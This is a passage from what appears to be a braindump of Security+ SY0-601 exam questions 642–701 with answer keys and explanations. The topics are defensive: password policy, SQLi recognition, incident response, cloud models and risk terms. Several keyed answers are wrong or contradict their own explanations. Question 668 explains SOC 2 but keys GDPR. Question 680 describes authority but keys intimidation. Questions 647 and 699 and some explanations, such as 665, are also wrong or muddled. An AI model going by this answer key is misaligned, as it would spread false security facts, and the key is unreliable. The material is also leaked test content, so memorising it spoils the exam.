credentials database leaked on the Internet. No business emails were identified in the breach, but
the security team thinks that the list of passwords exposed was later used to compromise
business accounts. Which of the following would mitigate the issue?
A.
B.
C.
D.
Complexity requirements
Password history
Acceptable use policy
Shared accounts
Answer: B
Explanation:
Password history policies determines the number of unique new passwords that must associated
with a user's account before an old password be reused. Essentially forcing users to create new
passwords on a regular basis.
For this situation, forcing users to use new unique passwords would somewhat mitigate the issue.
QUESTION 643
After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting
a vulnerability in the device's firmware, a penetration tester then gains shell access on another
networked asset. This technique is an example of:
A.
B.
C.
D.
privilege escalation
footprinting
persistence
pivoting
Answer: D
Explanation:
The act of an attacker moving from one compromised system to one or more other systems on
the network.
QUESTION 644
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
225
An organization has hired a red team to simulate attacks on its security posture. Which of the
following will the blue team do after detecting an IoC?
A.
B.
C.
D.
Reimage the impacted workstations.
Activate runbooks for incident response
Conduct forensics on the compromised system
Conduct passive reconnaissance to gather information
Answer: B
Explanation:
Incident is detected, now incident response has to happen. Runbook describes everyone's roles
during incident response.
QUESTION 645
A security analyst was called to Investigate a file received directly from a hardware manufacturer.
The analyst is trying to determine whether the file was modified in transit before installation on the
user's computer. Which of the following can be used to safely assess the file?
A.
B.
C.
D.
Check the hash of the installation file
Match the file names
Verify the URL download location
Verify the code-signing certificate
Answer: A
Explanation:
The hardware manufacturer will post the hash of the file publicly, and anyone who receives a
copy of that file will be able to run a checksum on the file themselves, and compare them to the
official manufacturer-provided checksum. Hashing is almost always the correct answer in these
type of questions. You'll see a lot of Github repositories using hashed checksums as well for
verification, and I recently just installed Java onto my new computer. Java provided me with a
hashed checksum for the setup executable.
QUESTION 646
After a recent security breach, a security analyst reports that several administrative usernames
and passwords are being sent via cleartext across the network to access network devices over
port 23. Which of the following should be implemented so all credentials sent over the network
are encrypted when remotely accessing and configuring network devices?
A.
B.
C.
D.
E.
SSH
SNMPv3
SFTP
Telnet
FTP
Answer: A
Explanation:
Port 23 (Telnet) and Port 22 (SSH) are network protocols used to remotely access and manage
systems however telnet does not encrypt the connection so captured traffic appears in cleartext
whereas an ssh connection would be encrypted.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
226
SNMP (Simple Network Management Protocol) - is a protocol for collecting and organizing
information about managed devices on networks. Devices that typically support SNMP include
servers/desktops, routers, switches, etc.
SFTP (Secure File Transfer Protocol) is a secure file transfer protocol that uses SSH encryption
to securely sending and receiving file transfers.
FTP (File Transfer Protocol) - For file transfers.
QUESTION 647
A security administrator has discovered that workstations on the LAN are becoming infected with
malware. The cause of the infections appears to be users receiving phishing emails that are
bypassing the current email-filtering technology. As a result, users are being tricked into clicking
on malicious URLs, as no internal controls currently exist in the environment to evaluate their
safety. Which of the following would be BEST to implement to address the issue?
A.
B.
C.
D.
E.
Forward proxy
HIDS
Awareness training
A jump server
IPS
Answer: B
QUESTION 648
Which of the following are common VoIP-associated vulnerabilities? (Choose two.)
A.
B.
C.
D.
E.
F.
SPIM
Vishing
Hopping
Phishing
Credential harvesting
Tailgating
Answer: BE
Explanation:
Vishing is VoIP-based phishing aimed at targeting specific users by using an unsuspecting caller
ID. The scammer uses a caller ID that appears from a legitimate source. This is done with the
intent to convince the caller to provide sensitive information, such as passwords, internet IP
network, or bank details.
Credential harvesting - It can be an email attack where hackers have found a way to leverage
voicemail to email notifications to send credential harvesting pages.
Vishing and credential harvesting as being the most common attacks, as hopping doesnt ever
seem to come up in the material.
https://fitsmallbusiness.com/voip-security-threats/
https://www.avanan.com/blog/hello-this-is-credential-harvesting-calling
QUESTION 649
A customer service representative reported an unusual text message that was sent to the help
desk. The message contained an unrecognized invoice number with a large balance due and a
link to click for more details. Which of the following BEST describes this technique?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
227
A.
B.
C.
D.
Vishing
Whaling
Phishing
Smishing
Answer: D
Explanation:
Pretty straightforward. Smishing, a portmanteau of SMS and phishing, is a specific type of
phishing done via text messaging, and it's commonly used to orchestrate invoice scams or
otherwise harvest credentials.
QUESTION 650
A security manager has tasked the security operations center with locating all web servers that
respond to an unsecure protocol.
Which of the following commands could an analyst run to find requested servers?
A.
B.
C.
D.
nslookup 10.10.10.0
nmap -p 80 10.10.10.0/24
pathping 10.10.10.0 -p 80
ne -1 -p 80
Answer: B
Explanation:
nmap -p 80 10.10.10.0/24 - Nmap or network mapper is a network discovery and security auditing
tool mainly used to find services, hosts, and open ports on a network. In this case, nmap will
check for the HTTP port 80.
Nslookup - This command queries DNS servers to obtain DNS records
Pathping - This command provides information about network latency and packet loss at hops
between a source and destination. Used for troubleshooting network issues.
QUESTION 651
Which of the following would detect intrusions at the perimeter of an airport?
A.
B.
C.
D.
E.
Signage
Fencing
Motion sensors
Lighting
Bollards
Answer: B
Explanation:
For this specific scenario, we're looking to detect intrusions on a perimeter and there is a type of
intrusion detection system used on fences that can be used to monitor the perimeter of a property
called PIDS. A Perimeter Intrusion Detection System (PIDS) are fence-mounted sensors that
monitor and detects any intruder attempting to breach the physical perimeter by sensing when
someone attempts to either climb or cut the fence.
Yes, Motion sensors can detect any movement but this can easily lead to false alarms as they
aren't the best for detecting types of movement. For example, a motion detector that detects an
employee authorized to access a restricted area. Just because it detected motion doesn't mean
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
228
necessarily mean they're intruders. PIDS will only generate an alarm when someone attempting
to climb/cut a fence as that type of action this would very likely be an intrusion attempt.
QUESTION 652
A cloud service provider has created an environment where customers can connect existing local
networks to the cloud for additional computing resources and block internal HR applications from
reaching the cloud. Which of the following cloud models is being used?
A.
B.
C.
D.
Public
Community
Hybrid
Private
Answer: C
Explanation:
Hybrid cloud since internal network and cloud computing is combined.
Private cloud = A cloud infrastructure setup and intended specifically for one client/customer.
Community Cloud = A cloud infrastructure shared by organizations within the same industry.
"Communitizes" the costs of cloud computing to reduce the cost burden per entity. Such as
banking organizations going in together on a community cloud platform designed specifically for
the banking industries cloud computing needs.
Hybrid = A mixed model where computing, storage, and applications are both on-premise and in
the cloud, as well as utilizing more than one cloud service. Most organizations are a hybrid cloud.
Public = Any cloud service offered to the general public. Ranging from Google Drive, Microsoft
Azure, Amazon Web Services, and Microsoft OneNote.
QUESTION 653
Developers are about to release a financial application, but the number of fields on the forms that
could be abused by an attacker is troubling.
Which of the following techniques should be used to address this vulnerability?
A.
B.
C.
D.
Implement input validation
Encrypt data Before submission
Perform a manual review
Conduct a peer review session
Answer: A
QUESTION 654
A research company discovered that an unauthorized piece of software has been detected on a
small number of machines in its lab. The researchers collaborate with other machines using port
445 and on the Internet using port 443. The unauthorized software is starting to be seen on
additional machines outside of the lab and is making outbound communications using HTTPS
and SMB. The security team has been instructed to resolve the problem as quickly as possible
causing minimal disruption to the researchers.
Which of the following contains the BEST course of action in this scenario?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
229
A.
B.
C.
D.
Update the host firewalls to block outbound SMB.
Place the machines with the unapproved software in containment.
Place the unauthorized application in a blocklist.
Implement a content filter to block the unauthorized software communication.
Answer: C
Explanation:
Application can no longer function, but all other communication continues as before.
QUESTION 655
Due to unexpected circumstances, an IT company must vacate its main office, forcing all
operations to alternate, off-site locations.
Which of the following will the company MOST likely reference for guidance during this change?
A.
B.
C.
D.
The business continuity plan
The retention policy
The disaster recovery plan
The incident response plan
Answer: A
Explanation:
The business continuity plan is to empower an organization to keep crucial functions running
during downtime. This, in turn, helps the organization respond quickly to an interruption, while
creating resilient operational protocols.
QUESTION 656
A DBA reports that several production server hard drives were wiped over the weekend. The DBA
also reports that several Linux servers were unavailable due to system files being deleted
unexpectedly. A security analyst verified that software was configured to delete data deliberately
from those servers. No backdoors to any servers were found. Which of the following attacks was
MOST likely used to cause the data loss?
A.
B.
C.
D.
E.
Logic Bomb
Ransomware
Fileless virus
Remote access Trojans
Rootkit
Answer: A
Explanation:
"software was configured to delete data deliberately from those servers"
This could be achieved by a cronjob.
QUESTION 657
Digital signatures use asymmetric encryption. This means the message is encrypted with:
A.
B.
C.
D.
the sender's private key and decrypted with the sender's public key.
the sender's public key and decrypted with the sender's private key.
the sender's private key and decrypted with the recipient's public key.
the sender's public key and decrypted with the recipient's private key.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
230
Answer: A
Explanation:
In order to verify the authenticity of a digital signature we need to encrypt the initial message with
the sender's private key.
The receiver then can verify the authenticity by decrypting the message with the sender's public
key.
https://docs.huihoo.com/globus/gt4-tutorial/ch09s03.html
QUESTION 658
A help desk technician receives a phone call from someone claiming to be a part of the
organizations cybersecurity incident response team. The caller asks the technician to verify
networks internal firewall IP address. Which of the following is the technicians BEST course of
action?
A. direct the caller to stop by the help desk in person and hang up declining any further requests
from the caller.
B. ask for the callers name, verify the persons identity in the email directory, and provide the
requested information over the phone.
C. write down the phone number of the caller if possible, the name of the person requesting the
information. Hang-up, and notify the organizations cybersecurity officer
D. request the caller send an email for identity verification and provide the requested information via
email to the caller.
Answer: C
Explanation:
In this scenario, the help desk technician should be wary of the person's request as help desk
technicians would not have this information. Also, if the person claimed to be from the
cybersecurity incident response team, they would more likely to have access to this information
anyway, or at least know who to contact.
For the sake of the technician, it would be best to get as much information as possible and
delegate the task of confirming the person's identity to the cybersecurity officer. Even in the very
slim chance that it was a legitimate request, it would still be best for the cyber security officer to
provide this information instead of a tech.
QUESTION 659
An employee received a word processing file that was delivered as an email attachment. The
subject line and email content enticed the employee to open the attachment.
Which of the following attack vectors BEST matches this malware?
A.
B.
C.
D.
embedded Python code
Macro-enabled file
Bash scripting
Credential-harvesting website
Answer: B
Explanation:
Phishing emails with a word document attachment typically will have macros that can be ran for
malicious purposes. Macros are scripts that can run whatever you want and however many times
you want it to run, it's generally used for automating frequently used tasks.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
231
Since macros can practically do whatever you want, they can be used for malicious purposes
such as infecting other files, or downloading/installing other malicious software.
Macros would normally run as soon as the document is opened but now macros are disabled in
Office apps by default so you would need to manually enable marcos on the file for them to run.
QUESTION 660
Which of the following is the BEST example of a cost-effective physical control to enforce a USB
removable media restriction policy?
A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly
inspecting the ports
B. implementing a GPO that will restrict access to authorized USB removable media and regularly
verifying that it is enforced
C. placing systems into locked key-controlled containers with no access to the USB ports
D. installing an endpoint agent to detect connectivity of USB and removable media
Answer: B
Explanation:
Once the GPO is implemented, it becomes a physical control by blocking data from being exfilled.
Its also cost effective as its already a part of the OS so there is essentially no cost to the end
user.
QUESTION 661
The SOC for a large MSSP in a meeting to discuss the lessons learned from a recent incident
that took much too long to resolve. This type of incident has become more common over weeks
and is consuming large amounts of the analysts time due to manual tasks being performed.
Which of the following solutions should the SOC consider to BEST improve its response time?
A.
B.
C.
D.
configure a NIDS appliance using a Switched Port Analyzer
collect OSINT and catalog the artifacts in a central repository
implement a SOAR with customizable playbooks
install a SIEM with community-driven threat intelligence
Answer: C
Explanation:
SOAR (Security Orchestration, Automation, and Response)
Can use either playbook or runbook. It assists in collecting threat related data from a range of
sources and automate responses to low level threats. (frees up some of the CSIRT time).
QUESTION 662
A security analyst is investigating suspicious traffic on the web server located at IP address
10.10.1.1. A search of the WAF logs reveals the following output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
232
Which of the following is MOST likely occurring?
A.
B.
C.
D.
XSS attack
SQLi attack
Replay attack
XSRF attack
Answer: B
Explanation:
SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for
backend database manipulation to access information that was not intended to be displayed. The
giveaway here is the 1=1 in the query which is essentially creating a condition that will
automatically be true.
XSS (Cross-Site Scripting) attacks -a type of injection, in which malicious scripts are injected into
otherwise benign and trusted websites.
Replay Attack - a kind of man-in-the-middle attack in which an attacker sniffs messages being
sent on a channel to intercept them and resend them under the cloak of authentic messages.
CSRF (Cross Sit Request Forgery)- attacks that target functionality that causes a state change on
the server, such as changing the victim's email address or password, or purchasing something.
QUESTION 663
Which of the following is an example of transference of risk?
A.
B.
C.
D.
purchasing insurance
patching vulnerable servers
retiring outdated applications
Application owner risk sign-off
Answer: A
Explanation:
Cyber insurance covers a business' liability for a data breach involving sensitive customer
information like health records, credit card numbers, account numbers etc. A few things insurance
generally handle are legal fees, notifying customers of the data breach, and repairing damaged
systems.
Risk transference is about assigning risk to a third-party. The risk here being the financial loss
that can be incurred after a data breach from legal fees, repairing system etc. The organization is
assigning this risk to an insurance company.
QUESTION 664
A security engineer was assigned to implement a solution to prevent attackers from gaining
access by pretending to be authorized users. Which of the following technologies meets the
requirement?
A.
B.
C.
D.
SSO
IDS
MFA
TPM
Answer: C
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
233
MFA = harder to impersonate due to having multifactor authentication.
QUESTION 665
A tax organization is working on a solution to validate the online submission of documents. The
solution should be carried on a portable USB device that should be inserted on any computer that
is transmitting a transaction securely.
Which of the following is the BEST certificate for these requirements?
A.
B.
C.
D.
user certificate
self-signed certificate
computer certificate
root certificate
Answer: A
Explanation:
After granting the power of attorney, the user signs the documents, the person responsible for the
financial notification.
QUESTION 666
During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which
of the following BEST explains this reasoning?
A.
B.
C.
D.
the forensic investigator forgot to run a checksum on the disk image after creation
the chain of custody form did not note time zone offsets between transportation regions
the computer was turned off, and a RAM image could not be taken at the same time
the hard drive was not properly kept in an antistatic bag when it was moved.
Answer: B
Explanation:
Chain of Custody is one of the important parts of forensics, cause someone has to take
responsibility for protecting the evidence. Your evidence also always has to show exact dates.
And in this question, the evidence needed to be transported to multiple geographical locations
before it got to the judge. So if there's a mismanagement of dates and times, it won't be legally
admissible in court, cause 2 rules have been violated.
QUESTION 667
A security analyst needs to be able to search and correlate logs from multiple sources in a single
tool. Which of the following would BEST allow a security analyst to have this ability?
A.
B.
C.
D.
SOAR
SIEM
Log collectors
Network-attached storage
Answer: B
Explanation:
SIEM event correlation is an essential part of any SIEM solution. It aggregates and analyzes log
data from across your network applications, systems, and devices, making it possible to discover
security threats and malicious patterns of behaviors that otherwise go unnoticed and can lead to
compromise or data loss.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
234
QUESTION 668
The chief information security officer (CISO) has requested that a third-party vendor provide
supporting documents that show proper controls are in place to protect customer data which of
the following would be BEST for the third-party vendor to provide the CISO?
A.
B.
C.
D.
GDPR compliance attestation
cloud security alliance materials
SOC 2 type 2 report
NIST RMP workbooks
Answer: A
Explanation:
The SOC 2 is a separate report that focuses on controls at a service provider relevant to security,
availability, processing integrity, confidentiality, and privacy of a system. GDPR is the unique
possible response, even though It's only applied in EU. The other responses are not related to
client data.
QUESTION 669
An enterprise has hired an outside security firm to conduct penetration testing on its network and
applications. The firm has not received information about the internal architecture. Which of the
following best represents the type of testing that will occur?
A.
B.
C.
D.
Bug bounty
Black-box
Gray-box
White-box
Answer: B
Explanation:
In White Box testing internal structure (code) is known.
In Black Box testing internal structure (code) is unknown.
In Grey Box Testing internal structure (code) is partially known.
QUESTION 670
A security analyst is reviewing application logs to determine the source of a breach and locates
the following log:
Which Of the following has been observed?
A.
B.
C.
D.
DLL Injection
API attack
SQLi
XSS
Answer: C
Explanation:
SQL Injection Based on 1=1 is Always True
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
235
SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious
SQL statements. These statements control a database server behind a web application.
Attackers can use SQL Injection vulnerabilities to bypass application security measures.
QUESTION 671
A security analyst is receiving numerous alerts reporting that the response time of an internetfacing application has been degraded. However, the internal network performance has degraded.
Which of the following MOST likely explains this behavior?
A.
B.
C.
D.
DNS poisoning
MAC flooding
DDoS attack
ARP poisoning
Answer: C
Explanation:
Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS).
This means that the attack is launched from multiple hosts simultaneously. Typically, a threat
actor will compromise machines to use as handlers in a command and control network. The
handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools
(bots) forming a botnet.
The internal network has not been affected by the attack.
QUESTION 672
Which of the following explains why RTO is included in a BIA?
A.
B.
C.
D.
It identifies the amount of allowable downtime for an application or system,
It prioritizes risks so the organization can allocate resources appropriately,
It monetizes the loss of an asset and determines a break even point for risk mitigation.
It informs the backup approach so that the organization can recover data to a known time.
Answer: A
Explanation:
RTO = Recovery time objective. "The maximum tolerable length of time that a computer, system,
network or application can be down after a failure or disaster occurs."
QUESTION 673
A company recently moved into a new annex of the building. Following the move, the help desk
received reports of week Wi-Fi signals from users in that part of the building. Which of the
following is the MOST likely cause of this issue?
A.
B.
C.
D.
WAP placement
Channel overlap
captive portals
AP security
Answer: A
QUESTION 674
Which of the following is a benefit of including a risk management framework into an
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
236
organizations security approach?
A. it defines expected service level from participating supply chain partners to ensure system
outages are remediated in a timely manner.
B. it defines specific vendor products that have been tested and approved for use in a secure
environment
C. it provides legal assurances and remedies in the event a data breach occurs
D. it incorporates control development, policy, and management activities into IT operations
Answer: D
Explanation:
An effective risk management framework will prioritize understanding the risks that your business
faces to take the necessary steps to protect your assets and your business.
QUESTION 675
A security analyst is evaluating solutions to deploy an additional layer of protection for a web
application. The goal is to allow only encrypted communications without relying on devices.
Which of the following can be implemented?
A.
B.
C.
D.
HTTP security header
DNSSEC implementation
SRTP
S/MIME
Answer: A
Explanation:
When enabled on the server, HTTP Strict Transport Security (HSTS), part of HTTP Security
header, enforces the use of encrypted HTTPS connections instead of plain-text HTTP
communication.
QUESTION 676
An IT security manager requests a report on company information that is publicly available. The
managers concern is that malicious actors will be able to access the data without in active
reconnaissance. Which of the following is the most efficient approach to perform the analysis?
A.
B.
C.
D.
Provide a domain parameter to theharvester tool
check public DNS entries using dnsenum
perform a Nessus vulnerability scan targeting a public company’s IP
execute nmap using the options: scan all ports and sneaky mode
Answer: A
Explanation:
theharvester - The package contains a tool for gathering subdomain names, e-mail addresses,
virtual hosts, open ports/ banners, and employee names from different public sources (search
engines, pgp key servers).
QUESTION 677
Which of the following documents provides expectations at a technical level for quality,
availability, and responsibilities?
A. EOL
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
237
B. SLA
C. MOU
D. EOSL
Answer: B
QUESTION 678
A security policy states that common words should not be used as passwords. A security auditor
was able to perform a dictionary attack against corporate credentials. Which of the following
controls was being violated?
A.
B.
C.
D.
password complexity
password history
password reuse
password length
Answer: A
Explanation:
Password complexity is a measure of how difficult a password is to guess in relation to any
number of guessing or cracking methods. For the security auditor to be able to successfully
perform a dictionary attack, that means that the credentials were too predictable and was likely a
common password.
QUESTION 679
A technician enables full disk encryption on a laptop that will be taken on a business trip. Which
of the following does this process BEST protect?
A.
B.
C.
D.
data in transit
data in processing
data at rest
data tokenization
Answer: C
Explanation:
Data at rest: Data at rest is data in its stored or resting state, which is typically on some type of
persistent storage such as a hard drive or tape. Symmetric encryption is used in this case.
QUESTION 680
In a phishing attack, the perpetrator is pretending to be someone in a position of power in an
effort to influence the target to click or follow the desired response. Which of the following
principles is being used?
A.
B.
C.
D.
Authority
Intimidation
Consensus
Scarcity
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
238
QUESTION 681
A company is working on mobile device security after a report revealed that users granted nonverified software access to corporate data. Which of the following is the most enforced security
control to mitigate this risk?
A.
B.
C.
D.
block access to application stores
implement OTA updates
update the BYOD policy
Deploy a uniform firmware
Answer: A
Explanation:
It is the most effective way to prevent standard users form installing unknown software if they are
using corporate owned mobile phones.
QUESTION 682
A company labeled some documents with the public sensitivity classification. This means the
documents can be accessed by?
A.
B.
C.
D.
employees of other companies and the press
all members of the department that created the documents
only the company's employees and those listed in the document
only the individuals listed in the documents
Answer: A
Explanation:
Public (unclassified) - there are no restrictions on viewing the data. Public information presents no
risk to an organization if it is disclosed but does present a risk if it is modified or not available.
QUESTION 683
A security engineer is building a file transfer solution to send files to a business partner. The
users would like to drop off the files in a specific directory and have the server send to the
business partner. The connection to the business partner is over the internet and needs to be
secure. Which of the following can be used?
A.
B.
C.
D.
S/MIME
LDAPS
SSH
SRTP
Answer: C
Explanation:
SSH - SSH or (Secure Shell) is a protocol that enables two computers to communicate securely
by encrypting the connection. Since the question is looking to transfer files over the internet to a
specific directory, the FTP protocol can be used for the file transfer itself. As SSH can be used
with the FTP protocol, this allows for secure(SSH) file transfer(FTP) over the internet.
S/MIME (Secure/Multipurpose internet Mail Extensions) - Digitally signs and encrypts the
contents of email messages.
LDAPS(Lightweight Directory Access Protocol) - Provides authentication for directory-based
traffic.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
239
SRTP (Secure Real-time Transport Protocol) - Provides authentication/encryption for transmitted
audio and video traffic.
QUESTION 684
A security incident has been resolved. Which of the following BEST described the importance of
the final phase of the incident response plan?
A. it examines and documents how well the team responded, discovers what caused the incident,
and determines how the incident can be avoided in the future
B. it returns the affected systems back into production once systems have been fully patched, data
restored, and vulnerabilities addressed
C. it identifies the incident and the scope of the breach, how it affects the production environment,
and the ingress point
D. it contains the affected systems and disconnects them from the network, preventing further
spread of the attack or breach.
Answer: A
Explanation:
The final phase of the incident response is also called the lessons learned or remediation step.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for
a future incident.
QUESTION 685
A business operations manager is concerned that a PC that is critical to business operations will
have a costly hardware failure soon. The manager is looking for options to continue business
operations without incurring large costs. Which of the following would mitigate the managers
concerns?
A.
B.
C.
D.
implement a full system upgrade
perform a physical-to-virtual migration
install uninterruptible power supplies
purchase cybersecurity insurance
Answer: B
Explanation:
A Physical to virtual migration (P2V), is the migration of physical machines to virtual machines.
Converting the PC to a VM temporarily will allow the PC to continue to its operations on a
different host. The other options would require that PC be turned off so the organization would not
have access to its function.
QUESTION 686
An engineer recently deployed a group of 100 web servers in a cloud environment.
Per the security policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
240
A.
B.
C.
D.
Application allow list
SWG
Host-based firewall
VPN
Answer: C
Explanation:
Host-based firewall - This is a firewall on a host where you can configured rules for
ports/connections allowed on that specific host.
As the question specifically is asking for web-server ports to be blocked, it would make more
sense to configure rules to block the ports on each web server.
Application allow list - A list of applications and application components that are permitted to
reside or perform actions on a device
SWG(Secure Web Gateway) - A security product that operates between employees and the
internet by filtering unsafe content from web traffic to stop cyber threats and data breaches. They
also block risky or unauthorized user behavior. SWGs usually analyses the content of traffic.
VPN (Virtual Private Network) - A service that establishes a secure encrypted connection
between networks over the internet. Hosts connected on the network will behave logically as if
they're on the same network even if they are a physically not.
QUESTION 687
A company is implementing BYOD and wants to ensure all users have access to the same cloudbased services.
Which of the following would BEST allow the company to meet this requirement?
A.
B.
C.
D.
laaS
PasS
MaaS
SaaS
Answer: D
Explanation:
Phones don't need access to server and network hardware (IaaS) or application development
server (PaaS) or Monitoring (MaaS).
QUESTION 688
Which of the following control Types would be BEST to use in an accounting department to
reduce losses from fraudulent transactions?
A.
B.
C.
D.
Recovery
Deterrent
Corrective
Detective
Answer: D
Explanation:
Detective controls - look for both fraudulent and unintentionally improper transactions after the
fact. Examples of detective controls include reconciliations, variance analyses, physical
inventories, audits, and continuous monitoring through data analytics.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
241
QUESTION 689
The database administration team is requesting guidance for a secure solution that will ensure
confidentiality of cardholder data at rest only in certain fields in the database schema.
The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered
useless if a data breach occurs.
Which of the following is the BEST solution to meet the requirement?
A.
B.
C.
D.
Tokenization
Masking
Full disk encryption
Mirroring
Answer: A
Explanation:
Tokenization is mainly used to protect data at rest whereas masking is used to protect data in
use.
QUESTION 690
A SOC operator is analyzing a log file that contains the following entries:
A.
B.
C.
D.
SQL injection and improper input-handling attempts
Cross-site scripting and resource exhaustion attempts
Command injection and directory traversal attempts
Error handling and privilege escalation attempts
Answer: C
Explanation:
Directory traversal is when an attacker uses the software on a web server to access data in a
directory other than the server's root directory. If the attempt is successful, the threat actor can
view restricted files or execute commands on the server.
Command injection is an attack that involves executing commands on a host. Typically, the threat
actor injects the commands by exploiting an application vulnerability, such as insufficient input
validation.
The attacker is attempting to traverse the directory of the host and execute the cat command
which could be used to print the contents of a file.
QUESTION 691
Which of the following actions would be recommended to improve an incident response process?
A.
B.
C.
D.
Train the team to identify the difference between events and incidents
Modify access so the IT team has full access to the compromised assets
Contact the authorities if a cybercrime is suspected
Restrict communication surrounding the response to the IT team
Answer: A
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
242
An event is defined as an attempt, successful or unsuccessful, to gain unauthorized access to,
disrupt or misuse an Information System or information stored on such Information System.
An incident is defined as a breach of a system's security policy in order to affect its integrity or
availability and/or the unauthorised access or attempted access to a system or systems.
QUESTION 692
An organization would like to give remote workers the ability to use applications hosted inside the
corporate network. Users will be allowed to use their personal computers or they will be provided
organization assets. Either way no data or applications will be installed locally on any user
systems. Which of the following mobile solutions would accomplish these goals?
A.
B.
C.
D.
VDI
MDM
COPE
UTM
Answer: A
Explanation:
MDM would require something to be installed. VDI, virtual desktop infrastructure, would allow
employees to use run apps on the company network without installing locally.
QUESTION 693
The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy
requiring all unsanctioned high-risk SaaS applications to be blocked from user access. Which of
the following is the BEST security solution to reduce this risk?
A.
B.
C.
D.
CASB
VPN concentrator
MFA
VPC endpoint
Answer: A
Explanation:
A cloud access security broker (CASB) is on-premises or cloud-based software that sits between
a cloud service consumer and a cloud service provider. It serves as a tool for enforcing an
organization's security policies through risk identification and regulation compliance whenever its
cloud-residing data is accessed.
QUESTION 694
Which of the following would BEST provide detective and corrective controls for thermal
regulation?
A.
B.
C.
D.
E.
A smoke detector
A fire alarm
An HVAC system
A fire suppression system
Guards
Answer: C
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
243
An HVAC system is designed to control the environment in which it works. It achieves this by
controlling the temperature (THERMAL) of a room through heating and cooling. It also controls
the humidity level in that environment by controlling the movement and distribution of air inside
the room. So it provides detective and corrective controls for THERMAL regulation.
QUESTION 695
Which of the following statements BEST describes zero-day exploits?
A.
B.
C.
D.
When a zero-day exploit is discovered, the system cannot be protected by any means
Zero-day exploits have their own scoring category in CVSS
A zero-day exploit is initially undetectable and no patch for it exists
Discovering zero-day exploits is always performed via bug bounty programs
Answer: C
Explanation:
A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not
yet patched. An exploit that attacks a zero-day vulnerability is called a zero-day exploit. In fact, a
zero-day exploit leaves NO opportunity for detection ... at first.
QUESTION 696
An organization discovered files with proprietary financial data have been deleted. The files have
been recovered from backup, but every time the Chief Financial
Officer logs in to the file server, the same files are deleted again. No other users are experiencing
this issue. Which of the following types of malware is MOST likely causing this behavior?
A.
B.
C.
D.
Logic bomb
Crypto malware
Spyware
Remote access Trojan
Answer: A
Explanation:
Logic bomb: a set of instructions secretly incorporated into a program so that if a particular
condition is satisfied they will be carried out, usually with harmful effects.
QUESTION 697
An IT manager is estimating the mobile device budget for the upcoming year.
Over the last five years, the number of devices that were replaced due to loss damage or theft
steadily increased by 10%.
Which of the following would BEST describe the estimated number of devices to be replaced next
year?
A.
B.
C.
D.
ALE
ARO
RPO
SLE
Answer: B
Explanation:
ARO - annualized rate of occurrence is a representation of the frequency of the event, measured
in a standard year. In our case number of the defecive device per year.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
244
Annualized Loss Expectancy (ALE) is the expected monetary loss that can be expected for an
asset due to a risk over a one year period. This question is asking about loss of devices in a year.
Annual loss expectancy (ALE) is the loss (amount of money) due ARO.
The question is about the number of the device, not about money.
QUESTION 698
Which of the following is assured when a user signs an email using a private key?
A.
B.
C.
D.
Non-repudiation
Confidentiality
Availably
Authentication
Answer: A
Explanation:
Professor Messer notes
• Non-Repudiation
– Confirm the authenticity of data
– Digital signature provides both integrity and non-repudiation
QUESTION 699
An organization implemented a process that compares the settings currently configured on
systems against secure configuration guidelines in order to identify any gaps.
Which of the following control types has the organization implemented?
A.
B.
C.
D.
Compensating
Corrective
Preventive
Detective
Answer: C
Explanation:
Preventive: the control acts to eliminate or reduce the likelihood that an attack can succeed. A
preventative control operates before an attack can take place. Compensating means to substitute
one control with another (not happened here), Corrective means the attack has already happened
(no mentioning), and detective is incorrect because the detective control detects ATTACKS, not
vulnerabilities.
QUESTION 700
A company wants to improve end users' experiences when they log in to a trusted partner
website. The company does not want the users to be issued separate credentials for the partner
website. Which of the following should be implemented to allow users to authenticate using their
own credentials to log in to the trusted partner's website?
A.
B.
C.
D.
Directory service
AAA server
Federation
Multifactor authentication
Answer: C
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
245
Explanation:
Federation: A process that allows for the conveyance of identity and authentication information
across a set of networked systems.
QUESTION 701
Which of the following would be the BEST way to analyze diskless malware that has infected a
